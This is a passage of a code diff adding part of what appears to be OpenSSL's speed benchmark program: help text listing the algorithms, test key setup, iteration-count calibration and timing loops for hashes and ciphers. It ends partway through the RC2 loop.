+# ifndef OPENSSL_NO_RC2
+            BIO_printf(bio_err, "rc2-cbc  ");
+# endif
+# ifndef OPENSSL_NO_RC5
+            BIO_printf(bio_err, "rc5-cbc  ");
+# endif
+# ifndef OPENSSL_NO_BF
+            BIO_printf(bio_err, "bf-cbc");
+# endif
+# if !defined(OPENSSL_NO_IDEA) || !defined(OPENSSL_NO_SEED) || !defined(OPENSSL_NO_RC2) || \
+    !defined(OPENSSL_NO_BF) || !defined(OPENSSL_NO_RC5)
+            BIO_printf(bio_err, "\n");
+# endif
+# ifndef OPENSSL_NO_DES
+            BIO_printf(bio_err, "des-cbc  des-ede3 ");
+# endif
+# ifndef OPENSSL_NO_AES
+            BIO_printf(bio_err, "aes-128-cbc aes-192-cbc aes-256-cbc ");
+            BIO_printf(bio_err, "aes-128-ige aes-192-ige aes-256-ige ");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+            BIO_printf(bio_err, "\n");
+            BIO_printf(bio_err,
+                       "camellia-128-cbc camellia-192-cbc camellia-256-cbc ");
+# endif
+# ifndef OPENSSL_NO_RC4
+            BIO_printf(bio_err, "rc4");
+# endif
+            BIO_printf(bio_err, "\n");
+
+# ifndef OPENSSL_NO_RSA
+            BIO_printf(bio_err, "rsa512   rsa1024  rsa2048  rsa4096\n");
+# endif
+
+# ifndef OPENSSL_NO_DSA
+            BIO_printf(bio_err, "dsa512   dsa1024  dsa2048\n");
+# endif
+# ifndef OPENSSL_NO_ECDSA
+            BIO_printf(bio_err, "ecdsap160 ecdsap192 ecdsap224 "
+                       "ecdsap256 ecdsap384 ecdsap521\n");
+            BIO_printf(bio_err,
+                       "ecdsak163 ecdsak233 ecdsak283 ecdsak409 ecdsak571\n");
+            BIO_printf(bio_err,
+                       "ecdsab163 ecdsab233 ecdsab283 ecdsab409 ecdsab571\n");
+            BIO_printf(bio_err, "ecdsa\n");
+# endif
+# ifndef OPENSSL_NO_ECDH
+            BIO_printf(bio_err, "ecdhp160  ecdhp192  ecdhp224 "
+                       "ecdhp256  ecdhp384  ecdhp521\n");
+            BIO_printf(bio_err,
+                       "ecdhk163  ecdhk233  ecdhk283  ecdhk409  ecdhk571\n");
+            BIO_printf(bio_err,
+                       "ecdhb163  ecdhb233  ecdhb283  ecdhb409  ecdhb571\n");
+            BIO_printf(bio_err, "ecdh\n");
+# endif
+
+# ifndef OPENSSL_NO_IDEA
+            BIO_printf(bio_err, "idea     ");
+# endif
+# ifndef OPENSSL_NO_SEED
+            BIO_printf(bio_err, "seed     ");
+# endif
+# ifndef OPENSSL_NO_RC2
+            BIO_printf(bio_err, "rc2      ");
+# endif
+# ifndef OPENSSL_NO_DES
+            BIO_printf(bio_err, "des      ");
+# endif
+# ifndef OPENSSL_NO_AES
+            BIO_printf(bio_err, "aes      ");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+            BIO_printf(bio_err, "camellia ");
+# endif
+# ifndef OPENSSL_NO_RSA
+            BIO_printf(bio_err, "rsa      ");
+# endif
+# ifndef OPENSSL_NO_BF
+            BIO_printf(bio_err, "blowfish");
+# endif
+# if !defined(OPENSSL_NO_IDEA) || !defined(OPENSSL_NO_SEED) || \
+    !defined(OPENSSL_NO_RC2) || !defined(OPENSSL_NO_DES) || \
+    !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_BF) || \
+    !defined(OPENSSL_NO_AES) || !defined(OPENSSL_NO_CAMELLIA)
+            BIO_printf(bio_err, "\n");
+# endif
+
+            BIO_printf(bio_err, "\n");
+            BIO_printf(bio_err, "Available options:\n");
+# if defined(TIMES) || defined(USE_TOD)
+            BIO_printf(bio_err, "-elapsed        "
+                       "measure time in real time instead of CPU user time.\n");
+# endif
+# ifndef OPENSSL_NO_ENGINE
+            BIO_printf(bio_err,
+                       "-engine e       "
+                       "use engine e, possibly a hardware device.\n");
+# endif
+            BIO_printf(bio_err, "-evp e          " "use EVP e.\n");
+            BIO_printf(bio_err,
+                       "-decrypt        "
+                       "time decryption instead of encryption (only EVP).\n");
+            BIO_printf(bio_err,
+                       "-mr             "
+                       "produce machine readable output.\n");
+# ifndef NO_FORK
+            BIO_printf(bio_err,
+                       "-multi n        " "run n benchmarks in parallel.\n");
+# endif
+            goto end;
+        }
+        argc--;
+        argv++;
+        j++;
+    }
+
+# ifndef NO_FORK
+    if (multi && do_multi(multi))
+        goto show_res;
+# endif
+
+    if (j == 0) {
+        for (i = 0; i < ALGOR_NUM; i++) {
+            if (i != D_EVP)
+                doit[i] = 1;
+        }
+        for (i = 0; i < RSA_NUM; i++)
+            rsa_doit[i] = 1;
+        for (i = 0; i < DSA_NUM; i++)
+            dsa_doit[i] = 1;
+# ifndef OPENSSL_NO_ECDSA
+        for (i = 0; i < EC_NUM; i++)
+            ecdsa_doit[i] = 1;
+# endif
+# ifndef OPENSSL_NO_ECDH
+        for (i = 0; i < EC_NUM; i++)
+            ecdh_doit[i] = 1;
+# endif
+    }
+    for (i = 0; i < ALGOR_NUM; i++)
+        if (doit[i])
+            pr_header++;
+
+    if (usertime == 0 && !mr)
+        BIO_printf(bio_err,
+                   "You have chosen to measure elapsed time "
+                   "instead of user CPU time.\n");
+
+# ifndef OPENSSL_NO_RSA
+    for (i = 0; i < RSA_NUM; i++) {
+        const unsigned char *p;
+
+        p = rsa_data[i];
+        rsa_key[i] = d2i_RSAPrivateKey(NULL, &p, rsa_data_length[i]);
+        if (rsa_key[i] == NULL) {
+            BIO_printf(bio_err, "internal error loading RSA key number %d\n",
+                       i);
+            goto end;
+        }
+#  if 0
+        else {
+            BIO_printf(bio_err,
+                       mr ? "+RK:%d:"
+                       : "Loaded RSA key, %d bit modulus and e= 0x",
+                       BN_num_bits(rsa_key[i]->n));
+            BN_print(bio_err, rsa_key[i]->e);
+            BIO_printf(bio_err, "\n");
+        }
+#  endif
+    }
+# endif
+
+# ifndef OPENSSL_NO_DSA
+    dsa_key[0] = get_dsa512();
+    dsa_key[1] = get_dsa1024();
+    dsa_key[2] = get_dsa2048();
+# endif
+
+# ifndef OPENSSL_NO_DES
+    DES_set_key_unchecked(&key, &sch);
+    DES_set_key_unchecked(&key2, &sch2);
+    DES_set_key_unchecked(&key3, &sch3);
+# endif
+# ifndef OPENSSL_NO_AES
+    AES_set_encrypt_key(key16, 128, &aes_ks1);
+    AES_set_encrypt_key(key24, 192, &aes_ks2);
+    AES_set_encrypt_key(key32, 256, &aes_ks3);
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+    Camellia_set_key(key16, 128, &camellia_ks1);
+    Camellia_set_key(ckey24, 192, &camellia_ks2);
+    Camellia_set_key(ckey32, 256, &camellia_ks3);
+# endif
+# ifndef OPENSSL_NO_IDEA
+    idea_set_encrypt_key(key16, &idea_ks);
+# endif
+# ifndef OPENSSL_NO_SEED
+    SEED_set_key(key16, &seed_ks);
+# endif
+# ifndef OPENSSL_NO_RC4
+    RC4_set_key(&rc4_ks, 16, key16);
+# endif
+# ifndef OPENSSL_NO_RC2
+    RC2_set_key(&rc2_ks, 16, key16, 128);
+# endif
+# ifndef OPENSSL_NO_RC5
+    RC5_32_set_key(&rc5_ks, 16, key16, 12);
+# endif
+# ifndef OPENSSL_NO_BF
+    BF_set_key(&bf_ks, 16, key16);
+# endif
+# ifndef OPENSSL_NO_CAST
+    CAST_set_key(&cast_ks, 16, key16);
+# endif
+# ifndef OPENSSL_NO_RSA
+    memset(rsa_c, 0, sizeof(rsa_c));
+# endif
+# ifndef SIGALRM
+#  ifndef OPENSSL_NO_DES
+    BIO_printf(bio_err, "First we calculate the approximate speed ...\n");
+    count = 10;
+    do {
+        long it;
+        count *= 2;
+        Time_F(START);
+        for (it = count; it; it--)
+            DES_ecb_encrypt((DES_cblock *)buf,
+                            (DES_cblock *)buf, &sch, DES_ENCRYPT);
+        d = Time_F(STOP);
+    } while (d < 3);
+    save_count = count;
+    c[D_MD2][0] = count / 10;
+    c[D_MDC2][0] = count / 10;
+    c[D_MD4][0] = count;
+    c[D_MD5][0] = count;
+    c[D_HMAC][0] = count;
+    c[D_SHA1][0] = count;
+    c[D_RMD160][0] = count;
+    c[D_RC4][0] = count * 5;
+    c[D_CBC_DES][0] = count;
+    c[D_EDE3_DES][0] = count / 3;
+    c[D_CBC_IDEA][0] = count;
+    c[D_CBC_SEED][0] = count;
+    c[D_CBC_RC2][0] = count;
+    c[D_CBC_RC5][0] = count;
+    c[D_CBC_BF][0] = count;
+    c[D_CBC_CAST][0] = count;
+    c[D_CBC_128_AES][0] = count;
+    c[D_CBC_192_AES][0] = count;
+    c[D_CBC_256_AES][0] = count;
+    c[D_CBC_128_CML][0] = count;
+    c[D_CBC_192_CML][0] = count;
+    c[D_CBC_256_CML][0] = count;
+    c[D_SHA256][0] = count;
+    c[D_SHA512][0] = count;
+    c[D_WHIRLPOOL][0] = count;
+    c[D_IGE_128_AES][0] = count;
+    c[D_IGE_192_AES][0] = count;
+    c[D_IGE_256_AES][0] = count;
+    c[D_GHASH][0] = count;
+
+    for (i = 1; i < SIZE_NUM; i++) {
+        c[D_MD2][i] = c[D_MD2][0] * 4 * lengths[0] / lengths[i];
+        c[D_MDC2][i] = c[D_MDC2][0] * 4 * lengths[0] / lengths[i];
+        c[D_MD4][i] = c[D_MD4][0] * 4 * lengths[0] / lengths[i];
+        c[D_MD5][i] = c[D_MD5][0] * 4 * lengths[0] / lengths[i];
+        c[D_HMAC][i] = c[D_HMAC][0] * 4 * lengths[0] / lengths[i];
+        c[D_SHA1][i] = c[D_SHA1][0] * 4 * lengths[0] / lengths[i];
+        c[D_RMD160][i] = c[D_RMD160][0] * 4 * lengths[0] / lengths[i];
+        c[D_SHA256][i] = c[D_SHA256][0] * 4 * lengths[0] / lengths[i];
+        c[D_SHA512][i] = c[D_SHA512][0] * 4 * lengths[0] / lengths[i];
+        c[D_WHIRLPOOL][i] = c[D_WHIRLPOOL][0] * 4 * lengths[0] / lengths[i];
+    }
+    for (i = 1; i < SIZE_NUM; i++) {
+        long l0, l1;
+
+        l0 = (long)lengths[i - 1];
+        l1 = (long)lengths[i];
+        c[D_RC4][i] = c[D_RC4][i - 1] * l0 / l1;
+        c[D_CBC_DES][i] = c[D_CBC_DES][i - 1] * l0 / l1;
+        c[D_EDE3_DES][i] = c[D_EDE3_DES][i - 1] * l0 / l1;
+        c[D_CBC_IDEA][i] = c[D_CBC_IDEA][i - 1] * l0 / l1;
+        c[D_CBC_SEED][i] = c[D_CBC_SEED][i - 1] * l0 / l1;
+        c[D_CBC_RC2][i] = c[D_CBC_RC2][i - 1] * l0 / l1;
+        c[D_CBC_RC5][i] = c[D_CBC_RC5][i - 1] * l0 / l1;
+        c[D_CBC_BF][i] = c[D_CBC_BF][i - 1] * l0 / l1;
+        c[D_CBC_CAST][i] = c[D_CBC_CAST][i - 1] * l0 / l1;
+        c[D_CBC_128_AES][i] = c[D_CBC_128_AES][i - 1] * l0 / l1;
+        c[D_CBC_192_AES][i] = c[D_CBC_192_AES][i - 1] * l0 / l1;
+        c[D_CBC_256_AES][i] = c[D_CBC_256_AES][i - 1] * l0 / l1;
+        c[D_CBC_128_CML][i] = c[D_CBC_128_CML][i - 1] * l0 / l1;
+        c[D_CBC_192_CML][i] = c[D_CBC_192_CML][i - 1] * l0 / l1;
+        c[D_CBC_256_CML][i] = c[D_CBC_256_CML][i - 1] * l0 / l1;
+        c[D_IGE_128_AES][i] = c[D_IGE_128_AES][i - 1] * l0 / l1;
+        c[D_IGE_192_AES][i] = c[D_IGE_192_AES][i - 1] * l0 / l1;
+        c[D_IGE_256_AES][i] = c[D_IGE_256_AES][i - 1] * l0 / l1;
+    }
+#   ifndef OPENSSL_NO_RSA
+    rsa_c[R_RSA_512][0] = count / 2000;
+    rsa_c[R_RSA_512][1] = count / 400;
+    for (i = 1; i < RSA_NUM; i++) {
+        rsa_c[i][0] = rsa_c[i - 1][0] / 8;
+        rsa_c[i][1] = rsa_c[i - 1][1] / 4;
+        if ((rsa_doit[i] <= 1) && (rsa_c[i][0] == 0))
+            rsa_doit[i] = 0;
+        else {
+            if (rsa_c[i][0] == 0) {
+                rsa_c[i][0] = 1;
+                rsa_c[i][1] = 20;
+            }
+        }
+    }
+#   endif
+
+#   ifndef OPENSSL_NO_DSA
+    dsa_c[R_DSA_512][0] = count / 1000;
+    dsa_c[R_DSA_512][1] = count / 1000 / 2;
+    for (i = 1; i < DSA_NUM; i++) {
+        dsa_c[i][0] = dsa_c[i - 1][0] / 4;
+        dsa_c[i][1] = dsa_c[i - 1][1] / 4;
+        if ((dsa_doit[i] <= 1) && (dsa_c[i][0] == 0))
+            dsa_doit[i] = 0;
+        else {
+            if (dsa_c[i] == 0) {
+                dsa_c[i][0] = 1;
+                dsa_c[i][1] = 1;
+            }
+        }
+    }
+#   endif
+
+#   ifndef OPENSSL_NO_ECDSA
+    ecdsa_c[R_EC_P160][0] = count / 1000;
+    ecdsa_c[R_EC_P160][1] = count / 1000 / 2;
+    for (i = R_EC_P192; i <= R_EC_P521; i++) {
+        ecdsa_c[i][0] = ecdsa_c[i - 1][0] / 2;
+        ecdsa_c[i][1] = ecdsa_c[i - 1][1] / 2;
+        if ((ecdsa_doit[i] <= 1) && (ecdsa_c[i][0] == 0))
+            ecdsa_doit[i] = 0;
+        else {
+            if (ecdsa_c[i] == 0) {
+                ecdsa_c[i][0] = 1;
+                ecdsa_c[i][1] = 1;
+            }
+        }
+    }
+    ecdsa_c[R_EC_K163][0] = count / 1000;
+    ecdsa_c[R_EC_K163][1] = count / 1000 / 2;
+    for (i = R_EC_K233; i <= R_EC_K571; i++) {
+        ecdsa_c[i][0] = ecdsa_c[i - 1][0] / 2;
+        ecdsa_c[i][1] = ecdsa_c[i - 1][1] / 2;
+        if ((ecdsa_doit[i] <= 1) && (ecdsa_c[i][0] == 0))
+            ecdsa_doit[i] = 0;
+        else {
+            if (ecdsa_c[i] == 0) {
+                ecdsa_c[i][0] = 1;
+                ecdsa_c[i][1] = 1;
+            }
+        }
+    }
+    ecdsa_c[R_EC_B163][0] = count / 1000;
+    ecdsa_c[R_EC_B163][1] = count / 1000 / 2;
+    for (i = R_EC_B233; i <= R_EC_B571; i++) {
+        ecdsa_c[i][0] = ecdsa_c[i - 1][0] / 2;
+        ecdsa_c[i][1] = ecdsa_c[i - 1][1] / 2;
+        if ((ecdsa_doit[i] <= 1) && (ecdsa_c[i][0] == 0))
+            ecdsa_doit[i] = 0;
+        else {
+            if (ecdsa_c[i] == 0) {
+                ecdsa_c[i][0] = 1;
+                ecdsa_c[i][1] = 1;
+            }
+        }
+    }
+#   endif
+
+#   ifndef OPENSSL_NO_ECDH
+    ecdh_c[R_EC_P160][0] = count / 1000;
+    ecdh_c[R_EC_P160][1] = count / 1000;
+    for (i = R_EC_P192; i <= R_EC_P521; i++) {
+        ecdh_c[i][0] = ecdh_c[i - 1][0] / 2;
+        ecdh_c[i][1] = ecdh_c[i - 1][1] / 2;
+        if ((ecdh_doit[i] <= 1) && (ecdh_c[i][0] == 0))
+            ecdh_doit[i] = 0;
+        else {
+            if (ecdh_c[i] == 0) {
+                ecdh_c[i][0] = 1;
+                ecdh_c[i][1] = 1;
+            }
+        }
+    }
+    ecdh_c[R_EC_K163][0] = count / 1000;
+    ecdh_c[R_EC_K163][1] = count / 1000;
+    for (i = R_EC_K233; i <= R_EC_K571; i++) {
+        ecdh_c[i][0] = ecdh_c[i - 1][0] / 2;
+        ecdh_c[i][1] = ecdh_c[i - 1][1] / 2;
+        if ((ecdh_doit[i] <= 1) && (ecdh_c[i][0] == 0))
+            ecdh_doit[i] = 0;
+        else {
+            if (ecdh_c[i] == 0) {
+                ecdh_c[i][0] = 1;
+                ecdh_c[i][1] = 1;
+            }
+        }
+    }
+    ecdh_c[R_EC_B163][0] = count / 1000;
+    ecdh_c[R_EC_B163][1] = count / 1000;
+    for (i = R_EC_B233; i <= R_EC_B571; i++) {
+        ecdh_c[i][0] = ecdh_c[i - 1][0] / 2;
+        ecdh_c[i][1] = ecdh_c[i - 1][1] / 2;
+        if ((ecdh_doit[i] <= 1) && (ecdh_c[i][0] == 0))
+            ecdh_doit[i] = 0;
+        else {
+            if (ecdh_c[i] == 0) {
+                ecdh_c[i][0] = 1;
+                ecdh_c[i][1] = 1;
+            }
+        }
+    }
+#   endif
+
+#   define COND(d) (count < (d))
+#   define COUNT(d) (d)
+#  else
+/* not worth fixing */
+#   error "You cannot disable DES on systems without SIGALRM."
+#  endif                        /* OPENSSL_NO_DES */
+# else
+#  define COND(c) (run && count<0x7fffffff)
+#  define COUNT(d) (count)
+#  ifndef _WIN32
+    signal(SIGALRM, sig_done);
+#  endif
+# endif                         /* SIGALRM */
+
+# ifndef OPENSSL_NO_MD2
+    if (doit[D_MD2]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_MD2], c[D_MD2][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_MD2][j]); count++)
+                EVP_Digest(buf, (unsigned long)lengths[j], &(md2[0]), NULL,
+                           EVP_md2(), NULL);
+            d = Time_F(STOP);
+            print_result(D_MD2, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_MDC2
+    if (doit[D_MDC2]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_MDC2], c[D_MDC2][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_MDC2][j]); count++)
+                EVP_Digest(buf, (unsigned long)lengths[j], &(mdc2[0]), NULL,
+                           EVP_mdc2(), NULL);
+            d = Time_F(STOP);
+            print_result(D_MDC2, j, count, d);
+        }
+    }
+# endif
+
+# ifndef OPENSSL_NO_MD4
+    if (doit[D_MD4]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_MD4], c[D_MD4][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_MD4][j]); count++)
+                EVP_Digest(&(buf[0]), (unsigned long)lengths[j], &(md4[0]),
+                           NULL, EVP_md4(), NULL);
+            d = Time_F(STOP);
+            print_result(D_MD4, j, count, d);
+        }
+    }
+# endif
+
+# ifndef OPENSSL_NO_MD5
+    if (doit[D_MD5]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_MD5], c[D_MD5][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_MD5][j]); count++)
+                EVP_Digest(&(buf[0]), (unsigned long)lengths[j], &(md5[0]),
+                           NULL, EVP_get_digestbyname("md5"), NULL);
+            d = Time_F(STOP);
+            print_result(D_MD5, j, count, d);
+        }
+    }
+# endif
+
+# if !defined(OPENSSL_NO_MD5) && !defined(OPENSSL_NO_HMAC)
+    if (doit[D_HMAC]) {
+        HMAC_CTX hctx;
+
+        HMAC_CTX_init(&hctx);
+        HMAC_Init_ex(&hctx, (unsigned char *)"This is a key...",
+                     16, EVP_md5(), NULL);
+
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_HMAC], c[D_HMAC][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_HMAC][j]); count++) {
+                HMAC_Init_ex(&hctx, NULL, 0, NULL, NULL);
+                HMAC_Update(&hctx, buf, lengths[j]);
+                HMAC_Final(&hctx, &(hmac[0]), NULL);
+            }
+            d = Time_F(STOP);
+            print_result(D_HMAC, j, count, d);
+        }
+        HMAC_CTX_cleanup(&hctx);
+    }
+# endif
+# ifndef OPENSSL_NO_SHA
+    if (doit[D_SHA1]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_SHA1], c[D_SHA1][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_SHA1][j]); count++)
+                EVP_Digest(buf, (unsigned long)lengths[j], &(sha[0]), NULL,
+                           EVP_sha1(), NULL);
+            d = Time_F(STOP);
+            print_result(D_SHA1, j, count, d);
+        }
+    }
+#  ifndef OPENSSL_NO_SHA256
+    if (doit[D_SHA256]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_SHA256], c[D_SHA256][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_SHA256][j]); count++)
+                SHA256(buf, lengths[j], sha256);
+            d = Time_F(STOP);
+            print_result(D_SHA256, j, count, d);
+        }
+    }
+#  endif
+
+#  ifndef OPENSSL_NO_SHA512
+    if (doit[D_SHA512]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_SHA512], c[D_SHA512][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_SHA512][j]); count++)
+                SHA512(buf, lengths[j], sha512);
+            d = Time_F(STOP);
+            print_result(D_SHA512, j, count, d);
+        }
+    }
+#  endif
+# endif
+
+# ifndef OPENSSL_NO_WHIRLPOOL
+    if (doit[D_WHIRLPOOL]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_WHIRLPOOL], c[D_WHIRLPOOL][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_WHIRLPOOL][j]); count++)
+                WHIRLPOOL(buf, lengths[j], whirlpool);
+            d = Time_F(STOP);
+            print_result(D_WHIRLPOOL, j, count, d);
+        }
+    }
+# endif
+
+# ifndef OPENSSL_NO_RIPEMD
+    if (doit[D_RMD160]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_RMD160], c[D_RMD160][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_RMD160][j]); count++)
+                EVP_Digest(buf, (unsigned long)lengths[j], &(rmd160[0]), NULL,
+                           EVP_ripemd160(), NULL);
+            d = Time_F(STOP);
+            print_result(D_RMD160, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_RC4
+    if (doit[D_RC4]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_RC4], c[D_RC4][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_RC4][j]); count++)
+                RC4(&rc4_ks, (unsigned int)lengths[j], buf, buf);
+            d = Time_F(STOP);
+            print_result(D_RC4, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_DES
+    if (doit[D_CBC_DES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_DES], c[D_CBC_DES][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_DES][j]); count++)
+                DES_ncbc_encrypt(buf, buf, lengths[j], &sch,
+                                 &DES_iv, DES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_DES, j, count, d);
+        }
+    }
+
+    if (doit[D_EDE3_DES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_EDE3_DES], c[D_EDE3_DES][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_EDE3_DES][j]); count++)
+                DES_ede3_cbc_encrypt(buf, buf, lengths[j],
+                                     &sch, &sch2, &sch3,
+                                     &DES_iv, DES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_EDE3_DES, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_AES
+    if (doit[D_CBC_128_AES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_128_AES], c[D_CBC_128_AES][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_128_AES][j]); count++)
+                AES_cbc_encrypt(buf, buf,
+                                (unsigned long)lengths[j], &aes_ks1,
+                                iv, AES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_128_AES, j, count, d);
+        }
+    }
+    if (doit[D_CBC_192_AES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_192_AES], c[D_CBC_192_AES][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_192_AES][j]); count++)
+                AES_cbc_encrypt(buf, buf,
+                                (unsigned long)lengths[j], &aes_ks2,
+                                iv, AES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_192_AES, j, count, d);
+        }
+    }
+    if (doit[D_CBC_256_AES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_256_AES], c[D_CBC_256_AES][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_256_AES][j]); count++)
+                AES_cbc_encrypt(buf, buf,
+                                (unsigned long)lengths[j], &aes_ks3,
+                                iv, AES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_256_AES, j, count, d);
+        }
+    }
+
+    if (doit[D_IGE_128_AES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_IGE_128_AES], c[D_IGE_128_AES][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_IGE_128_AES][j]); count++)
+                AES_ige_encrypt(buf, buf2,
+                                (unsigned long)lengths[j], &aes_ks1,
+                                iv, AES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_IGE_128_AES, j, count, d);
+        }
+    }
+    if (doit[D_IGE_192_AES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_IGE_192_AES], c[D_IGE_192_AES][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_IGE_192_AES][j]); count++)
+                AES_ige_encrypt(buf, buf2,
+                                (unsigned long)lengths[j], &aes_ks2,
+                                iv, AES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_IGE_192_AES, j, count, d);
+        }
+    }
+    if (doit[D_IGE_256_AES]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_IGE_256_AES], c[D_IGE_256_AES][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_IGE_256_AES][j]); count++)
+                AES_ige_encrypt(buf, buf2,
+                                (unsigned long)lengths[j], &aes_ks3,
+                                iv, AES_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_IGE_256_AES, j, count, d);
+        }
+    }
+    if (doit[D_GHASH]) {
+        GCM128_CONTEXT *ctx =
+            CRYPTO_gcm128_new(&aes_ks1, (block128_f) AES_encrypt);
+        CRYPTO_gcm128_setiv(ctx, (unsigned char *)"0123456789ab", 12);
+
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_GHASH], c[D_GHASH][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_GHASH][j]); count++)
+                CRYPTO_gcm128_aad(ctx, buf, lengths[j]);
+            d = Time_F(STOP);
+            print_result(D_GHASH, j, count, d);
+        }
+        CRYPTO_gcm128_release(ctx);
+    }
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+    if (doit[D_CBC_128_CML]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_128_CML], c[D_CBC_128_CML][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_128_CML][j]); count++)
+                Camellia_cbc_encrypt(buf, buf,
+                                     (unsigned long)lengths[j], &camellia_ks1,
+                                     iv, CAMELLIA_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_128_CML, j, count, d);
+        }
+    }
+    if (doit[D_CBC_192_CML]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_192_CML], c[D_CBC_192_CML][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_192_CML][j]); count++)
+                Camellia_cbc_encrypt(buf, buf,
+                                     (unsigned long)lengths[j], &camellia_ks2,
+                                     iv, CAMELLIA_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_192_CML, j, count, d);
+        }
+    }
+    if (doit[D_CBC_256_CML]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_256_CML], c[D_CBC_256_CML][j],
+                          lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_256_CML][j]); count++)
+                Camellia_cbc_encrypt(buf, buf,
+                                     (unsigned long)lengths[j], &camellia_ks3,
+                                     iv, CAMELLIA_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_256_CML, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_IDEA
+    if (doit[D_CBC_IDEA]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_IDEA], c[D_CBC_IDEA][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_IDEA][j]); count++)
+                idea_cbc_encrypt(buf, buf,
+                                 (unsigned long)lengths[j], &idea_ks,
+                                 iv, IDEA_ENCRYPT);
+            d = Time_F(STOP);
+            print_result(D_CBC_IDEA, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_SEED
+    if (doit[D_CBC_SEED]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_SEED], c[D_CBC_SEED][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_SEED][j]); count++)
+                SEED_cbc_encrypt(buf, buf,
+                                 (unsigned long)lengths[j], &seed_ks, iv, 1);
+            d = Time_F(STOP);
+            print_result(D_CBC_SEED, j, count, d);
+        }
+    }
+# endif
+# ifndef OPENSSL_NO_RC2
+    if (doit[D_CBC_RC2]) {
+        for (j = 0; j < SIZE_NUM; j++) {
+            print_message(names[D_CBC_RC2], c[D_CBC_RC2][j], lengths[j]);
+            Time_F(START);
+            for (count = 0, run = 1; COND(c[D_CBC_RC2][j]); count++)
